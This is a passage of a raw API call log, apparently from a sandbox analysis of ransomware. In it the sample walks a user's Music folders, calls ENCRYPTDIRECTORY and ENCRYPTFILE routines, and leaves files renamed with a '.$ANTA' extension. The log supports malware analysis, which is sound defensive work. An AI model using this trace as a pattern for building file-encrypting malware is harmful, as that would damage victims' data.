RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0117.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0117.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0117.297] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0117.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0117.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0117.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0117.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0117.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0117.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0117.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0117.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0117.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.298] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0117.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4ae0 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4370 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4948 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.300] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.300] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.300] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.300] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.300] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t")) returned 0x10 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.300] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.301] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.301] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.301] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\*", lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3e07b50, ftCreationTime.dwHighDateTime=0x1d5ef8e, ftLastAccessTime.dwLowDateTime=0x120ba08d, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x120ba08d, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca7a8, cFileName=".", cAlternateFileName="")) returned 0x41ac600 [0117.302] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3e07b50, ftCreationTime.dwHighDateTime=0x1d5ef8e, ftLastAccessTime.dwLowDateTime=0x120ba08d, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x120ba08d, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca7a8, cFileName="..", cAlternateFileName="")) returned 1 [0117.302] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x116be4a7, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x116be4a7, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x118ae172, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x17260, dwReserved0=0x0, dwReserved1=0x43ca7a8, cFileName="HkFnDV.mp3.$ANTA", cAlternateFileName="HKFNDV~1.$AN")) returned 1 [0117.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a40c8 | out: hHeap=0x1780000) returned 1 [0117.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.302] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11a9e0be, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x11a9e0be, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x11b5cc91, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xbb80, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="kEfh1XIhHEyxIZI.m4a.$ANTA", cAlternateFileName="KEFH1X~1.$AN")) returned 1 [0117.302] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11c8de92, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x11c8de92, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x11cda4b5, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x7090, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="mzZHZq983SYlb.mp3.$ANTA", cAlternateFileName="MZZHZQ~1.$AN")) returned 1 [0117.302] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ef04fd, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x11ef04fd, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1204796e, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x12110, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="ssO YlBHXom4.mp3.$ANTA", cAlternateFileName="SSOYLB~1.$AN")) returned 1 [0117.302] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2860, ftCreationTime.dwHighDateTime=0x144e8e8, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2860, ftLastWriteTime.dwLowDateTime=0x43e99c8, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="", cAlternateFileName="\x80нńဓ+\x10")) returned 0 [0117.302] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0117.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0117.302] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0117.302] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0117.315] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\a-lwly-3ukn4pq_otnq")) returned 0x10 [0117.315] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\*", lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd896870, ftCreationTime.dwHighDateTime=0x1d5e460, ftLastAccessTime.dwLowDateTime=0xcd2a4b80, ftLastAccessTime.dwHighDateTime=0x1d5eeda, ftLastWriteTime.dwLowDateTime=0xcd2a4b80, ftLastWriteTime.dwHighDateTime=0x1d5eeda, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca850, cFileName=".", cAlternateFileName="")) returned 0x41ac540 [0117.316] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd896870, ftCreationTime.dwHighDateTime=0x1d5e460, ftLastAccessTime.dwLowDateTime=0xcd2a4b80, ftLastAccessTime.dwHighDateTime=0x1d5eeda, ftLastWriteTime.dwLowDateTime=0xcd2a4b80, ftLastWriteTime.dwHighDateTime=0x1d5eeda, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca850, cFileName="..", cAlternateFileName="")) returned 1 [0117.316] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542d010, ftCreationTime.dwHighDateTime=0x1d5efed, ftLastAccessTime.dwLowDateTime=0x1323e620, ftLastAccessTime.dwHighDateTime=0x1d5e37b, ftLastWriteTime.dwLowDateTime=0x1323e620, ftLastWriteTime.dwHighDateTime=0x1d5e37b, nFileSizeHigh=0x0, nFileSizeLow=0x65cf, dwReserved0=0x0, dwReserved1=0x43ca850, cFileName="Glkh.mp3", cAlternateFileName="")) returned 1 [0117.316] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b87d480, ftCreationTime.dwHighDateTime=0x1d5e0cf, ftLastAccessTime.dwLowDateTime=0xf027b580, ftLastAccessTime.dwHighDateTime=0x1d5e63f, ftLastWriteTime.dwLowDateTime=0xf027b580, ftLastWriteTime.dwHighDateTime=0x1d5e63f, nFileSizeHigh=0x0, nFileSizeLow=0x11773, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="ymTK.m4a", cAlternateFileName="")) returned 1 [0117.316] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e27e0, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x13, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3574, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="Ȑнńဓ+\x10")) returned 0 [0117.316] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0117.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Glkh.mp3|ymTK.m4a", cchCount1=18, lpString2="", cchCount2=0) returned 3 [0117.316] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0117.316] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\Glkh.mp3", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542d010, ftCreationTime.dwHighDateTime=0x1d5efed, ftLastAccessTime.dwLowDateTime=0x1323e620, ftLastAccessTime.dwHighDateTime=0x1d5e37b, ftLastWriteTime.dwLowDateTime=0x1323e620, ftLastWriteTime.dwHighDateTime=0x1d5e37b, nFileSizeHigh=0x0, nFileSizeLow=0x65cf, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="Glkh.mp3", cAlternateFileName="")) returned 0x41ac000 [0117.316] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0117.316] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0117.316] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0117.317] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0117.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cac10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0117.318] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 